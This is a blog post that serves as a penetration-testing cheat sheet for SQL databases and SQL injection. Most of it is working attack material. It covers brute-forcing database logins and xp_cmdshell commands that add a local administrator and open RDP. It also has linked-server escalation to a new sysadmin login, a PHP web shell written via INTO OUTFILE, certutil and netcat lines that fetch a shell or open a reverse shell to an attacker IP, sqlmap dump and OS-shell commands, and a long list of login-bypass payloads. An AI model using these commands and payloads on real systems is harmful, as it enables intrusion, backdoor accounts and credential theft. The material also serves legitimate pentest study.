Skip to main content

SQL DB & SQL Injection Pentest Cheat Sheet

By 

1) MSSQL Injection Cheat Sheet | pentestmonkey

2) xp_cmdshell | Red Team tales

3) PentesterMonkey SQL Injection Cheatsheet

   Use dbeaver for GUI Access 

4) SQL Injection Explanation | Graceful Security

Common Ports

Microsoft SQL:
1433/TCP (default listener)
1434/UDP (browser service)
4022/TCP (service broker)
5022/TCP (AlwaysOn High Availability default)
135/TCP (Transaction SQL Debugger)
2383/TCP (Analysis Services)
2382/TCP (SQL Server Browser Service)
500,4500/UDP (IPSec)
137-138/UDP (NetBios / CIFS)
139/TCP (NetBios CIFS)
445/TCP (CIFS)

Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP

MongoDB:
27017,27018,27019/TCP


PostgreSQL:
8432/TCP

MySQL:
3306/TCP

SQL DB Enum with nmap:

nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add" 


nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.10

MSSQL/MYSQL DB Login Bruteforce


git clone https://github.com/m8r0wn/enumdb.git
cd enumdb 
python3 setup.py install

Download Wordlist from Seclists
cat mssql-betterdefaultpasslist.txt  | cut -f1 -d":" > user.txt
cat mssql-betterdefaultpasslist.txt  | cut -f2 -d":" > pass.txt


#Port is optional
#-t = mysql or mssql; mssql port  1433/1434; mysql port - 3309
# -U = users.txt, -u = username; -P = passwords.txt, -p = password

enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v


SQSH usage:

sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'

\go

EXEC xp_cmdshell 'net localgroup administrators bhanu /add'

\go
MssqlClient 

Exploiting From Windows with Explanation - Nikhil Mittal

#Enumeration using Metasploit 
auxiliary(admin/mssql/mssql_enum)  

mssqlclient.py username@10.10.10.10

#Run arbitary commands
xp_cmdshell whoami

#View Version
SELECT @@version

#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();

#List Users
SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

#Enum Privs
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#Show Servername
select @@servername

#Show linked servers
select * from sysservers;   
select name from sysservers;

#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];

#Find the username from which we can run commands on the server 
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];

#Check sysadmin accounts on the server/DB
 EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
 
#Check your permissions on the server 
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];

#Running command as a linked server using the server that we have permissions on 
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#View the permissions you have on the linked database.
 EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as other user multile times

EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

#Login as a new user
mssqlclient.py newuser@10.10.10.10
P@$$w0rd123

#List Databases 
SELECT name FROM master..sysdatabases;

#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]
select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;

#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';

#Abusing Xpdirtree
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1'   /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
      /This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
  /union all is used to combine 2 or more select statements
  /Where ever output is displayed - it is suitable to enumerate, here 5

website.com/comment.php?id=738 union select 1,2,3,4,@@version,6  /mysql version command

website.com/comment.php?id=738 union select 1,2,3,4,user(),6  /Current user

website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
     /Prints all of the table names in the database

website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema where table_name='users'
     /Extract column names from Table - Ue

website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users



ERROR BASED SQL Injection: SQLLITE
==================================

http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;

http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;

search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--;           # Get all table names in sqlite_master db

search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--;                 #Get usernames and passwords            
TIME BASED SQL INJECTION:
--------------------------
In Time  Based SQL injection - if the query is true - it will wait for the sleep time or else 
executed immediately.

website.com/comment.php?id=738-sleep(5)  /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
    /Executes after 5 seconds -Because the statement is true

website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0) 
    /Executes Immediately - Statement is false


website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
    /Loading a file from the server

website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'

website.com/backdoor.php/cmd?ipconfig

SQL Command Injection: MSSQL

bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--

admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--

admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe

sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password


If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;



Creating an Admin Account with RDP Access:

aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--

aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--

aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';---

NSE Script for XP_CMDSHELL


H2 DB Command Execution 

Method-I
CREATE ALIAS EXEC_OS_COMMAND AS '
String exec(String cmd) throws Exception {
    Process process = Runtime.getRuntime().exec(cmd);
    Scanner scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");
    return scanner.hasNext() ? scanner.next() : "";
}';
SELECT EXEC_OS_COMMAND('whoami');

Method-II
inject= ' or 1=0; CREATE ALIAS EXECVE AS ' String execve(String cmd) throws java.io.IOException { Process process = Runtime.getRuntime().exec(cmd); java.io.InputStream inputStream = process.getInputStream(); java.io.FileOutputStream fileOutputStream = new java.io.FileOutputStream("/var/www/html/output.html"); byte[] buffer = new byte[1024]; int bytesRead; while ((bytesRead = inputStream.read(buffer)) != -1) { fileOutputStream.write(buffer, 0, bytesRead); } fileOutputStream.close(); inputStream.close(); return "Output written to /var/www/html/output.html"; }'; -- - 

inject= ' or 1=0; CALL EXECVE('ls /'); -- -
Bypassing Restriction Interfaces:
----------------------------------
Use Tamper Data Firefox plugin.  /Intercetps Posts requests

start tampter data --> input something inoto input field. or change the items in 
drop down.
SQLMAP:
---------

#Skip a parameter 
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param_Name

#Test only specified parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param1,Param2

#Dump All DB dat
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5

#Get a shell
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell

sqlmap --help

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"



List all the databases:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --dbs



Current User:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --current-user



Current DB:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --current-db



Tables:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --tables -D owasp10



Columns:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --columns -T accounts -D owasp10



Dump:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 -T accounts -D owasp10 --dump



OS Shell:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --os-shell



SQL Shell:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --sql-shell 

current_user()

user()

database()

select tablename from information_schema.table where table_schema = 'owasp10'

 
Methodology 

1) Check for login pages - try all special characters

2) f12 --> run the page; check for any search functionality like search?q= or id=1?; something like that


 

Cheatsheet

admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--

USERNAME: ' or 1/*
PASSWORD: */ =1 --

USERNAME: admin' or 'a'='a
PASSWORD '#

If the database is mysql, try to dump all login info to files?

Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--

union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Labels:

Comments

Post a Comment

Popular posts from this blog

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more